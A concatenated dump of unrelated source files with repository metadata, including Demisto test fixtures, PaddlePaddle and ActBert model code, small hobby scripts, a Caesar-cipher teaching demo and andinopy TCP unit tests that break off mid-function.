'previousRoles': None, 'rawCategory': '',
'rawCloseReason': '', 'rawJSON': '',
'rawName': 'Multiple Failed Logins', 'rawPhase': '',
'rawType': 'Unclassified', 'reason': '',
'reminder': '0001-01-01T00:00:00Z', 'roles': None,
'runStatus': 'error', 'severity': 1, 'sla': 0,
'sortValues': ['_score'], 'sourceBrand': 'Manual',
'sourceInstance': 'admin', 'status': 1,
'type': 'Unclassified', 'version': 10}], 'total': 3},
'HumanReadable': None, 'ImportantEntryContext': None, 'EntryContext': None, 'IgnoreAutoExtract': False,
'ReadableContentsFormat': '', 'ContentsFormat': 'json', 'File': '', 'FileID': '', 'FileMetadata': None,
'System': '', 'Note': False, 'Evidence': False, 'EvidenceID': '', 'Tags': None,
'Metadata': {'id': '', 'version': 0, 'modified': '0001-01-01T00:00:00Z', 'sortValues': None, 'roles': None,
'allRead': False, 'allReadWrite': False, 'previousRoles': None, 'previousAllRead': False,
'previousAllReadWrite': False, 'hasRole': False, 'dbotCreatedBy': '', 'ShardID': 0, 'type': 1,
'created': '2020-10-03T12:39:59.908094336Z', 'retryTime': '0001-01-01T00:00:00Z', 'user': '',
'errorSource': '', 'contents': '', 'format': 'json', 'investigationId': '51', 'file': '',
'fileID': '', 'parentId': '156@51', 'pinned': False, 'fileMetadata': None,
'parentContent': '!getIncidents page="0" query="-status:closed and runStatus:error"',
'parentEntryTruncated': False, 'system': '', 'reputations': None, 'category': '', 'note': False,
'isTodo': False, 'tags': None, 'tagsRaw': None, 'startDate': '0001-01-01T00:00:00Z', 'times': 0,
'recurrent': False, 'endingDate': '0001-01-01T00:00:00Z', 'timezoneOffset': 0, 'cronView': False,
'scheduled': False, 'entryTask': None, 'taskId': '', 'playbookId': '', 'reputationSize': 0,
'contentsSize': 0, 'brand': 'Builtin', 'instance': 'Builtin', 'IndicatorTimeline': None,
'mirrored': False}, 'IndicatorTimeline': None}]
TASKS_RESULT = [
{'ModuleName': 'Demisto REST API_instance_1', 'Brand': 'Demisto REST API', 'Category': 'Utilities', 'ID': '',
'Version': 0, 'Type': 1, 'Contents': {'response': [{'ancestors': ['AutoFocusPolling'],
'arguments': {'additionalPollingCommandArgNames': '',
'additionalPollingCommandArgValues': '',
'ids': '', 'pollingCommand': '',
'pollingCommandArgName': 'ids'},
'comments': False, 'completedBy': 'DBot',
'completedDate': '2020-09-29T16:48:30.427891714Z',
'doNotSaveTaskHistory': True,
'dueDate': '0001-01-01T00:00:00Z', 'dueDateDuration': 0,
'entries': ['4@7', '5@7'],
'evidenceData': {'description': None, 'occurred': None,
'tags': None}, 'forEachIndex': 0,
'forEachInputs': None, 'id': '3', 'indent': 0,
'nextTasks': {'#none#': ['1']}, 'note': False, 'outputs': {},
'playbookInputs': None, 'previousTasks': {'#none#': ['0']},
'quietMode': 2, 'reputationCalc': 0,
'restrictedCompletion': False, 'scriptArguments': {
'additionalPollingCommandArgNames': {'complex': None,
'simple': '${inputs.AdditionalPollingCommandArgNames}'},
'additionalPollingCommandArgValues': {'complex': None,
'simple': '${inputs.AdditionalPollingCommandArgValues}'},
'ids': {'complex': None, 'simple': '${inputs.Ids}'},
'pollingCommand': {'complex': None, 'simple': '${inputs.PollingCommandName}'},
'pollingCommandArgName': {'complex': None, 'simple': '${inputs.PollingCommandArgName}'}},
'separateContext': False,
'startDate': '2020-09-29T16:48:30.324811804Z',
'state': 'Error', 'task': {
'brand': '', 'conditions': None,
'description': 'RunPollingCommand',
'id': 'c6a3af0a-cc78-4323-80c1-93d686010d86',
'isCommand': False,
'isLocked': False,
'modified': '2020-09-29T08:23:25.596407031Z',
'name': 'RunPollingCommand',
'playbookName': '',
'scriptId': 'RunPollingCommand',
'sortValues': None,
'type': 'regular', 'version': 1},
'taskCompleteData': [],
'taskId': 'c6a3af0a-cc78-4323-80c1-93d686010d86',
'type': 'regular',
'view': {'position': {'x': 50, 'y': 195}}}]},
'HumanReadable': None, 'ImportantEntryContext': None, 'EntryContext': None, 'IgnoreAutoExtract': False,
'ReadableContentsFormat': '', 'ContentsFormat': 'json', 'File': '', 'FileID': '', 'FileMetadata': None,
'System': '', 'Note': False, 'Evidence': False, 'EvidenceID': '', 'Tags': None,
'Metadata': {
'id': '', 'version': 0, 'modified': '0001-01-01T00:00:00Z', 'sortValues': None, 'roles': None,
'allRead': False, 'allReadWrite': False, 'previousRoles': None, 'previousAllRead': False,
'previousAllReadWrite': False, 'hasRole': False, 'dbotCreatedBy': '', 'ShardID': 0, 'type': 1,
'created': '2020-10-03T12:43:23.006018275Z', 'retryTime': '0001-01-01T00:00:00Z', 'user': '',
'errorSource': '', 'contents': '', 'format': 'json', 'investigationId': '51', 'file': '',
'fileID': '', 'parentId': '158@51', 'pinned': False, 'fileMetadata': None,
'parentContent': '!demisto-api-post uri="investigation/7/workplan/tasks" body='
'"{\\"states\\":[\\"Error\\"],\\"types\\":[\\"regular\\",\\"condition\\",\\"collection\\"]}"',
'parentEntryTruncated': False, 'system': '', 'reputations': None, 'category': '', 'note': False,
'isTodo': False, 'tags': None, 'tagsRaw': None, 'startDate': '0001-01-01T00:00:00Z', 'times': 0,
'recurrent': False, 'endingDate': '0001-01-01T00:00:00Z', 'timezoneOffset': 0, 'cronView': False,
'scheduled': False, 'entryTask': None, 'taskId': '', 'playbookId': '', 'reputationSize': 0,
'contentsSize': 0, 'brand': 'Demisto REST API', 'instance': 'Demisto REST API_instance_1',
'IndicatorTimeline': None, 'mirrored': False}, 'IndicatorTimeline': None}]
SERVER_URL = [{'ModuleName': 'CustomScripts',
'Brand': 'Scripts',
'Category': 'automation',
'ID': '', 'Version': 0,
'Type': 1,
'Contents': 'https://ec2-11-123-11-22.eu-west-1.compute.amazonaws.com//acc_test',
'HumanReadable': 'https://ec2-11-123-11-22.eu-west-1.compute.amazonaws.com//acc_test'}]
| 73.178344 | 120 | 0.400296 |
876e608ab1ad7269c5b3143258735f34b8ee792d
| 6,885 |
py
|
Python
|
Paddle_Industry_Practice_Sample_Library/nlp_projects/event_extraction/ernie/train.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 1 |
2022-01-12T06:52:43.000Z
|
2022-01-12T06:52:43.000Z
|
Paddle_Industry_Practice_Sample_Library/nlp_projects/event_extraction/ernie/train.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | null | null | null |
Paddle_Industry_Practice_Sample_Library/nlp_projects/event_extraction/ernie/train.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import ast
import argparse
import warnings
from functools import partial
from data import read, load_dict, convert_example_to_features
from model import ErnieForTokenClassification
from utils import set_seed
from evaluate import evaluate
import paddle
import paddle.nn.functional as F
from paddlenlp.datasets import load_dataset
from paddlenlp.transformers import ErnieTokenizer, ErnieModel, LinearDecayWithWarmup
from paddlenlp.data import Stack, Pad, Tuple
from paddlenlp.metrics import ChunkEvaluator
warnings.filterwarnings("ignore")
# yapf: disable
parser = argparse.ArgumentParser(__doc__)
parser.add_argument("--model_name", type=str, default="trigger", help="The trigger or role model which you wanna train")
parser.add_argument("--num_epoch", type=int, default=3, help="Number of epoches for fine-tuning.")
parser.add_argument("--learning_rate", type=float, default=5e-5, help="Learning rate used to train with warmup.")
parser.add_argument("--tag_path", type=str, default=None, help="tag set path")
parser.add_argument("--train_path", type=str, default=None, help="train data")
parser.add_argument("--dev_path", type=str, default=None, help="dev data")
parser.add_argument("--weight_decay", type=float, default=0.01, help="Weight decay rate for L2 regularizer.")
parser.add_argument("--warmup_proportion", type=float, default=0.1, help="Warmup proportion params for warmup strategy")
parser.add_argument("--max_seq_len", type=int, default=512, help="Number of words of the longest seqence.")
parser.add_argument("--eval_step", type=int, default=100, help="evaluation step")
parser.add_argument("--log_step", type=int, default=20, help="log step")
parser.add_argument("--batch_size", type=int, default=32, help="Total examples' number in batch for training.")
parser.add_argument("--checkpoint", type=str, default=None, help="Directory to model checkpoint")
parser.add_argument("--seed", type=int, default=1000, help="random seed for initialization")
parser.add_argument('--device', choices=['cpu', 'gpu'], default="gpu", help="Select which device to train model, defaults to gpu.")
args = parser.parse_args()
# yapf: enable
def train():
# set running envir
paddle.set_device(args.device)
world_size = paddle.distributed.get_world_size()
rank = paddle.distributed.get_rank()
if world_size > 1:
paddle.distributed.init_parallel_env()
set_seed(args.seed)
if not os.path.exists(args.checkpoint):
os.mkdir(args.checkpoint)
model_name = "ernie-1.0"
# load and process data
tag2id, id2tag = load_dict(args.tag_path)
train_ds = load_dataset(read, data_path=args.train_path, lazy=False)
dev_ds = load_dataset(read, data_path=args.dev_path, lazy=False)
tokenizer = ErnieTokenizer.from_pretrained(model_name)
trans_func = partial(convert_example_to_features, tokenizer=tokenizer, tag2id=tag2id, max_seq_length=args.max_seq_len, pad_default_tag="O", is_test=False)
train_ds = train_ds.map(trans_func, lazy=False)
dev_ds = dev_ds.map(trans_func, lazy=False)
batchify_fn = lambda samples, fn=Tuple(
Pad(axis=0, pad_val=tokenizer.pad_token_id), # input_ids
Pad(axis=0, pad_val=tokenizer.pad_token_type_id), # token_type
Stack(), # seq len
Pad(axis=0, pad_val=-1) # tag_ids
): fn(samples)
train_batch_sampler = paddle.io.DistributedBatchSampler(train_ds, batch_size=args.batch_size, shuffle=True)
dev_batch_sampler = paddle.io.DistributedBatchSampler(dev_ds, batch_size=args.batch_size, shuffle=False)
train_loader = paddle.io.DataLoader(train_ds, batch_sampler=train_batch_sampler, collate_fn=batchify_fn)
dev_loader = paddle.io.DataLoader(dev_ds, batch_sampler=dev_batch_sampler, collate_fn=batchify_fn)
# configure model training
ernie = ErnieModel.from_pretrained(model_name)
event_model = ErnieForTokenClassification(ernie, num_classes=len(tag2id))
event_model = paddle.DataParallel(event_model)
num_training_steps = len(train_loader) * args.num_epoch
lr_scheduler = LinearDecayWithWarmup(args.learning_rate, num_training_steps, args.warmup_proportion)
decay_params = [p.name for n, p in event_model.named_parameters() if not any(nd in n for nd in ["bias", "norm"])]
optimizer = paddle.optimizer.AdamW(learning_rate=lr_scheduler, parameters=event_model.parameters(), weight_decay=args.weight_decay, apply_decay_param_fun=lambda x: x in decay_params)
metric = ChunkEvaluator(label_list=tag2id.keys(), suffix=False)
# start to train event_model
global_step, best_f1 = 0, 0.
event_model.train()
for epoch in range(1, args.num_epoch+1):
for batch_data in train_loader:
input_ids, token_type_ids, seq_len, tag_ids = batch_data
# logits: [batch_size, seq_len, num_tags] --> [batch_size*seq_len, num_tags]
logits = event_model(input_ids, token_type_ids).reshape([-1, len(tag2id)])
loss = paddle.mean(F.cross_entropy(logits, tag_ids.reshape([-1]), ignore_index=-1))
loss.backward()
lr_scheduler.step()
optimizer.step()
optimizer.clear_grad()
if global_step > 0 and global_step % args.log_step == 0 and rank == 0:
print(f"{args.model_name} - epoch: {epoch} - global_step: {global_step}/{num_training_steps} - loss:{loss.numpy().item():.6f}")
if global_step > 0 and global_step % args.eval_step == 0 and rank == 0:
precision, recall, f1_score = evaluate(event_model, dev_loader, metric)
event_model.train()
if f1_score > best_f1:
print(f"best F1 performence has been updated: {best_f1:.5f} --> {f1_score:.5f}")
best_f1 = f1_score
paddle.save(event_model.state_dict(), f"{args.checkpoint}/{args.model_name}_best.pdparams")
print(f'{args.model_name} evalution result: precision: {precision:.5f}, recall: {recall:.5f}, F1: {f1_score:.5f} current best {best_f1:.5f}')
global_step += 1
if rank == 0:
paddle.save(event_model.state_dict(), f"{args.checkpoint}/{args.model_name}_final.pdparams")
if __name__=="__main__":
train()
| 48.485915 | 186 | 0.719971 |
5e84984ae0f06d786328916607bcc1625391072b
| 562 |
py
|
Python
|
Python/B6-4Digit_Anzeige/4Digit_AnzeigeV1.py
|
frankyhub/Calliope
|
335f0ef5ca9bcf57e14166319501ec9086bc09bf
|
[
"MIT"
] | null | null | null |
Python/B6-4Digit_Anzeige/4Digit_AnzeigeV1.py
|
frankyhub/Calliope
|
335f0ef5ca9bcf57e14166319501ec9086bc09bf
|
[
"MIT"
] | null | null | null |
Python/B6-4Digit_Anzeige/4Digit_AnzeigeV1.py
|
frankyhub/Calliope
|
335f0ef5ca9bcf57e14166319501ec9086bc09bf
|
[
"MIT"
] | null | null | null |
_4digit: grove.TM1637 = None
def on_forever():
global _4digit
if input.button_is_pressed(Button.A):
_4digit = grove.create_display(DigitalPin.C16, DigitalPin.C17)
_4digit.bit(1, 3)
basic.pause(1000)
_4digit.bit(2, 3)
basic.pause(1000)
_4digit.bit(3, 3)
basic.pause(1000)
_4digit.bit(1, 2)
basic.pause(1000)
_4digit.bit(2, 2)
basic.pause(1000)
_4digit.bit(3, 2)
basic.pause(1000)
_4digit.clear()
basic.forever(on_forever)
| 26.761905 | 71 | 0.571174 |
0de689074f3d0903c9e424541e0d4a0beb6145f1
| 704 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/patches/v6_0/fix_outstanding_amount.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:55:29.000Z
|
2021-04-29T14:55:29.000Z
|
frappe-bench/apps/erpnext/erpnext/patches/v6_0/fix_outstanding_amount.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/patches/v6_0/fix_outstanding_amount.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | 1 |
2021-04-29T14:39:01.000Z
|
2021-04-29T14:39:01.000Z
|
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from erpnext.accounts.doctype.gl_entry.gl_entry import update_outstanding_amt
def execute():
for dt, party_field, account_field in (("Sales Invoice", "customer", "debit_to"),
("Purchase Invoice", "supplier", "credit_to")):
wrong_invoices = frappe.db.sql("""select name, {0} as account from `tab{1}`
where docstatus=1 and ifnull({2}, '')=''""".format(account_field, dt, party_field))
for invoice, account in wrong_invoices:
update_outstanding_amt(account, party_field.title(), None, dt, invoice)
| 44 | 86 | 0.738636 |
df66648f74dafed3138c1218f750827e93a15a4f
| 1,536 |
py
|
Python
|
contest_server/pjkiserver/storage/database.py
|
amrohendawi/AlphaZero-implementation
|
42103e63308ba256208b6dd6ddcbef2e797e9932
|
[
"MIT"
] | null | null | null |
contest_server/pjkiserver/storage/database.py
|
amrohendawi/AlphaZero-implementation
|
42103e63308ba256208b6dd6ddcbef2e797e9932
|
[
"MIT"
] | null | null | null |
contest_server/pjkiserver/storage/database.py
|
amrohendawi/AlphaZero-implementation
|
42103e63308ba256208b6dd6ddcbef2e797e9932
|
[
"MIT"
] | null | null | null |
from pymongo import MongoClient
from pymongo.errors import ConnectionFailure
from collections.abc import MutableMapping
class DatabaseDictionary(MutableMapping):
'''
A persistent dictionary, which only accepts str keys.
It is based and reliant on a mongoDB
'''
def __init__(self, url='localhost', port=27017, database_timeout_ms=2000):
self.mongo_client = MongoClient(url, port,
serverSelectionTimeoutMS=database_timeout_ms)
print("Trying to connect to database...")
# Connect DB. Will raise ConnectionError if no DB found
self.mongo_client.admin.command('ismaster')
# Store handles for our collection
self.mongo_database = self.mongo_client['pjki']
self.mongo_collection = self.mongo_database['game-history']
print("Database connected.")
def __getitem__(self, key):
if type(key) is not str:
raise TypeError('Key is not string')
hit = self.mongo_collection.find_one({'key': key})
return hit['value'] if hit else None
def __setitem__(self, key, value):
self.mongo_collection.delete_many({'key': key})
self.mongo_collection.insert_one({
'key': key,
'value': value
})
def __delitem__(self, key):
self.mongo_collection.delete_many({'key': key})
def __iter__(self):
return iter([entry['key'] for entry in self.mongo_collection.find()])
def __len__(self):
return self.mongo_collection.count_documents({})
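# Hedged usage sketch, not part of the original module: basic use of the mapping,
# assuming a MongoDB instance is reachable on the default localhost:27017.
if __name__ == '__main__':
    store = DatabaseDictionary()
    store['game-1'] = {'players': ['alice', 'bob'], 'moves': []}
    print(store['game-1'])  # -> {'players': ['alice', 'bob'], 'moves': []}
    print(len(store))       # number of stored keys
    del store['game-1']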
| 31.346939 | 78 | 0.66276 |
10ffea6e650097420cba320c4e53e75a1cbfa21f
| 3,103 |
py
|
Python
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/paddlevideo/modeling/losses/actbert_loss.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 5 |
2022-01-30T07:35:58.000Z
|
2022-02-08T05:45:20.000Z
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/paddlevideo/modeling/losses/actbert_loss.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 1 |
2022-01-14T02:33:28.000Z
|
2022-01-14T02:33:28.000Z
|
Paddle_Industry_Practice_Sample_Library/Football_Action/PaddleVideo/paddlevideo/modeling/losses/actbert_loss.py
|
linuxonly801/awesome-DeepLearning
|
b063757fa130c4d56aea5cce2e592610f1e169f9
|
[
"Apache-2.0"
] | 1 |
2022-03-07T10:51:21.000Z
|
2022-03-07T10:51:21.000Z
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from ..registry import LOSSES
from .base import BaseWeightedLoss
@LOSSES.register()
class ActBertLoss(BaseWeightedLoss):
"""Loss for ActBert model
"""
def __init__(self, vocab_size=30522, a_target_size=700):
super().__init__()
self.vocab_size = vocab_size
self.a_target_size = a_target_size
self.loss_fct = nn.CrossEntropyLoss(ignore_index=-1)
self.vis_criterion = nn.KLDivLoss(reduction="none")
def forward(self, prediction_scores_t, prediction_scores_v, prediction_scores_a, seq_relationship_score, \
text_labels, image_label, image_target, action_label, next_sentence_label):
"""
Args:
text_label: text label(with mask). Shape: [batch_size, seqence_length]
image_label: image label(with mask). Shape: [batch_size, region_length]
image_target: label of image feature distribution,
Shape: [batch_size, region_length-1, num_image_class](minus 1 for xxx).
action label: action label(with mask), Shape: [batch_size, action_length]
next_sentence_label: is next sentence or not. Shape: [batch_size]
"""
prediction_scores_v = prediction_scores_v[:,
1:] #8,37,1601 --> 8,36,1601
img_loss = self.vis_criterion(
F.log_softmax(prediction_scores_v, axis=2),
image_target #8,36,1601
)
masked_img_loss = paddle.sum(
img_loss * (image_label == 1).unsqueeze(2).astype('float32')) / max(
paddle.sum((image_label == 1).astype('float32')), 1e-6)
masked_text_loss = self.loss_fct(
prediction_scores_t.reshape([-1, self.vocab_size]), #8,36,30522
text_labels.reshape([-1]), #8,36 # label -1 will be ignored
)
masked_action_loss = self.loss_fct(
prediction_scores_a.reshape([-1, self.a_target_size]), #8,5,700
action_label.reshape([-1]), #8,5
)
next_sentence_loss = self.loss_fct(
seq_relationship_score.reshape([-1, 2]),
next_sentence_label.reshape([-1]) #8,2
)
total_loss = masked_text_loss.unsqueeze(0) + masked_img_loss.unsqueeze(
0) + masked_action_loss.unsqueeze(0) + next_sentence_loss.unsqueeze(
0)
return total_loss
| 40.828947 | 110 | 0.651305 |
80271e9a71149f2c4d6cbfc01bfb28367b274d91
| 670 |
py
|
Python
|
challenges/blackrock/stock_grants.py
|
PlamenHristov/HackerRank
|
2c875995f0d51d7026c5cf92348d9fb94fa509d6
|
[
"MIT"
] | null | null | null |
challenges/blackrock/stock_grants.py
|
PlamenHristov/HackerRank
|
2c875995f0d51d7026c5cf92348d9fb94fa509d6
|
[
"MIT"
] | null | null | null |
challenges/blackrock/stock_grants.py
|
PlamenHristov/HackerRank
|
2c875995f0d51d7026c5cf92348d9fb94fa509d6
|
[
"MIT"
] | null | null | null |
import sys
def test():
N = 12
rating = [6, 1, 1, 1, 2, 2, 2, 3, 3, 3, 4, 5]
min = [2, 1, 2, 3, 2, 1, 2, 3, 2, 1, 2, 3]
res = 53
res_list = [7, 1, 2, 3, 4, 4, 4, 5, 5, 6, 7]
N = int(sys.stdin.readline())
rating = list(map(int, sys.stdin.readline().split()))
min_num_shares = list(map(int, sys.stdin.readline().split()))
for i in range(N - 1):
if rating[i + 1] > rating[i]:
min_num_shares[i + 1] = min_num_shares[i] + 1
for i in reversed(range(N - 1)):
if rating[i] > rating[i + 1] and min_num_shares[i] <= min_num_shares[i + 1]:
min_num_shares[i] = min_num_shares[i + 1] + 1
print(min_num_shares)
print(sum(min_num_shares))
| 30.454545 | 80 | 0.574627 |
d548fc4da25b7c6af8763df016af13aa1a9964e2
| 287 |
py
|
Python
|
koissu-master/movement.py
|
jaakaappi/archived-projects
|
be1f754eca7c1434f3a363b0ea8ebcd190a42436
|
[
"MIT"
] | null | null | null |
koissu-master/movement.py
|
jaakaappi/archived-projects
|
be1f754eca7c1434f3a363b0ea8ebcd190a42436
|
[
"MIT"
] | 3 |
2021-03-10T13:18:31.000Z
|
2021-05-11T09:20:11.000Z
|
koissu-master/movement.py
|
jaakaappi/archived-projects
|
be1f754eca7c1434f3a363b0ea8ebcd190a42436
|
[
"MIT"
] | null | null | null |
import redis
from gpiozero import LED
from time import sleep
r = redis.StrictRedis(host='localhost', port=6379, db=0)
p = r.pubsub()
p.subscribe('move')
led = LED(2)
while True:
message = p.get_message()
if message:
led.on()
sleep(5)
led.off()
sleep(1)
| 16.882353 | 56 | 0.630662 |
1272611f7036314ac6792ab0e628f710b4806159
| 317 |
py
|
Python
|
exercises/ja/exc_03_06.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 2,085 |
2019-04-17T13:10:40.000Z
|
2022-03-30T21:51:46.000Z
|
exercises/ja/exc_03_06.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 79 |
2019-04-18T14:42:55.000Z
|
2022-03-07T08:15:43.000Z
|
exercises/ja/exc_03_06.py
|
Jette16/spacy-course
|
32df0c8f6192de6c9daba89740a28c0537e4d6a0
|
[
"MIT"
] | 361 |
2019-04-17T13:34:32.000Z
|
2022-03-28T04:42:45.000Z
|
import spacy
# Define the custom component
def length_component(doc):
    # Get the doc's length
    doc_length = ____
    print(f"この文章は {doc_length} トークンの長さです。")
    # Return the doc
    ____
# Load the small Japanese model
nlp = spacy.load("ja_core_news_sm")
# Add the component first in the pipeline and print the pipe names
____.____(____)
print(nlp.pipe_names)
# Process a text
doc = ____
| 15.095238 | 43 | 0.725552 |
c3ac35dc4575989fa92ffea6fb532c848ca3c735
| 638 |
py
|
Python
|
src/caesar-brute-force.py
|
hacker-school/Kryptografie
|
de033d435ca5bbb908968596dfa8d12c26317167
|
[
"CC0-1.0"
] | null | null | null |
src/caesar-brute-force.py
|
hacker-school/Kryptografie
|
de033d435ca5bbb908968596dfa8d12c26317167
|
[
"CC0-1.0"
] | null | null | null |
src/caesar-brute-force.py
|
hacker-school/Kryptografie
|
de033d435ca5bbb908968596dfa8d12c26317167
|
[
"CC0-1.0"
] | null | null | null |
#!/usr/local/bin/python3
"""
Demo of a brute-force attack on a Caesar cipher
HackerSchool 2020
"""
def caesar(text, schluessel):
"""
    Encrypts the text by shifting its letters by schluessel
    positions, as in the Caesar cipher.
"""
chiffre = ""
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
alphabet += alphabet
for i in range(len(text)):
buchstabe = text[i]
stelle = alphabet.index(buchstabe)
chiffre += alphabet[stelle+schluessel]
return chiffre
demochiffre = "LEGOIVWGLSSP"
for i in range(27):
print("i = ", i, " :", caesar(demochiffre, -i))
| 25.52 | 65 | 0.673981 |
6180bc91ed5d948cc391d9b617aeea57c95d2e2f
| 9,700 |
py
|
Python
|
pytest/andinotcp/test_tcp.py
|
andino-systems/andinopy
|
28fc09fbdd67dd690b9b3f80f03a05c342c777e1
|
[
"Apache-2.0"
] | null | null | null |
pytest/andinotcp/test_tcp.py
|
andino-systems/andinopy
|
28fc09fbdd67dd690b9b3f80f03a05c342c777e1
|
[
"Apache-2.0"
] | null | null | null |
pytest/andinotcp/test_tcp.py
|
andino-systems/andinopy
|
28fc09fbdd67dd690b9b3f80f03a05c342c777e1
|
[
"Apache-2.0"
] | null | null | null |
# _ _ _
# / \ _ __ __| (_)_ __ ___ _ __ _ _
# / _ \ | '_ \ / _` | | '_ \ / _ \| '_ \| | | |
# / ___ \| | | | (_| | | | | | (_) | |_) | |_| |
# /_/ \_\_| |_|\__,_|_|_| |_|\___/| .__/ \__, |
# |_| |___/
# by Jakob Groß
import os
import sys
import time
import socket
import unittest
from typing import List
import andinopy.tcp.simpletcp
import andinopy.tcp.andino_tcp
from unittest import TestCase
from andinopy.tcp.io_x1_emulator import x1_emulator
class TcpClient:
def __init__(self, Address: str, Port: int, timeout: int = 5):
# Create a TCP/IP socket
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.settimeout(timeout)
self.server_connection = Address, Port
def connect(self) -> bool:
self.socket.connect(self.server_connection)
return True
def stop(self):
self.socket.close()
def send(self, message) -> bool:
self.socket.sendall(message.encode())
return True
def send_with_response(self, message, expected) -> bool:
self.socket.sendall(message.encode())
amount_received = 0
amount_expected = len(expected)
received = ""
while amount_received < amount_expected:
data = self.socket.recv(16)
amount_received += len(data)
received += data.decode()
if received == expected:
return True
return False
def receive_message(self):
return self.socket.recv(1024).decode()
class test_tcp_server(TestCase):
def test_receive(self):
# tracemalloc.start()
port = 9999
server_message = ""
def on_message(message: str, _):
nonlocal server_message
server_message = message
server = andinopy.tcp.simpletcp.tcp_server(port=port, on_message=on_message)
server.start()
client = TcpClient('localhost', port)
try:
assert (client.connect())
for i in range(10):
test_message = f"test {i}"
client.send(test_message)
time.sleep(0.1)
self.assertEqual(test_message, server_message)
finally:
server.stop()
client.stop()
self.assertEqual(server._running, False)
# tracemalloc.stop()
def test_tcp_broadcast(self):
port = 9998
test_message = "broadcast"
server = andinopy.tcp.simpletcp.tcp_server(port=port,
generate_broadcast=lambda x: test_message,
broadcast_timer=1)
client = TcpClient('localhost', port, )
try:
server.start()
assert (client.connect())
result = client.receive_message()
self.assertEqual(result, test_message)
finally:
server.stop()
client.stop()
def test_answer(self):
port = 9997
def on_message(message: str, handle: andinopy.tcp.simpletcp.tcp_server.client_handle):
handle.send_message(message)
try:
server = andinopy.tcp.simpletcp.tcp_server(port=port, on_message=on_message)
server.start()
client = TcpClient('localhost', port)
assert (client.connect())
for i in range(10000):
test_message = f"test {i}"
self.assertEqual(client.send_with_response(test_message, test_message), True)
finally:
client.stop()
server.stop()
class test_andino_tcp(TestCase):
port_number = 10000
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
def test_1broadcast(self):
import gpiozero
from gpiozero.pins.mock import MockFactory
gpiozero.Device.pin_factory = MockFactory()
port = 8999
andino_tcp = andinopy.tcp.andino_tcp.andino_tcp("io", port)
client = TcpClient('localhost', port, )
self.assertIsInstance(andino_tcp.x1_instance, x1_emulator)
inputs = andino_tcp.x1_instance.io.input_pins
relays = andino_tcp.x1_instance.io.relay_pins
for i in andino_tcp.x1_instance.io.Inputs:
i.pull_up = False
andino_tcp.start()
client.connect()
try:
expected_low = 100
for _ in range(expected_low):
for i in inputs:
pin = gpiozero.Device.pin_factory.pin(i)
pin.drive_high()
pin.drive_low()
receive = client.receive_message()
self.assertEqual(":0000{64,64,64,64,64,64}{0,0,0,0,0,0}\n", receive)
finally:
andino_tcp.stop()
client.stop()
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
def test_2relays(self):
import gpiozero
from gpiozero.pins.mock import MockFactory
gpiozero.Device.pin_factory = MockFactory()
port = 9995
andino_tcp = andinopy.tcp.andino_tcp.andino_tcp("io", port)
client = TcpClient('localhost', port, )
inputs = andino_tcp.x1_instance.io.input_pins
relays = andino_tcp.x1_instance.io.relay_pins
andino_tcp.x1_instance.io.input_pull_up = [False for _ in range(len(inputs))]
andino_tcp.start()
client.connect()
try:
expect = "REL? 1\n"
client.send(expect)
receive = client.receive_message()
print(receive)
self.assertEqual(expect, receive)
for i in range(len(relays)):
message = f"REL{i + 1} 1\n"
client.send(message)
time.sleep(0.1)
self.assertEqual(andino_tcp.x1_instance.io.outRel[i].value, 1)
receive = client.receive_message()
self.assertEqual(message, receive)
time.sleep(andino_tcp.tcpserver.broadcast_timer)
receive = client.receive_message()
print(receive)
self.assertTrue(receive.endswith("{1,1,1}\n"))
finally:
andino_tcp.stop()
client.stop()
def test_pulsing(self):
if not sys.platform.startswith("linux"):
import gpiozero
from gpiozero.pins.mock import MockFactory
gpiozero.Device.pin_factory = MockFactory()
port = 9995
andino_tcp = andinopy.tcp.andino_tcp.andino_tcp("io", port)
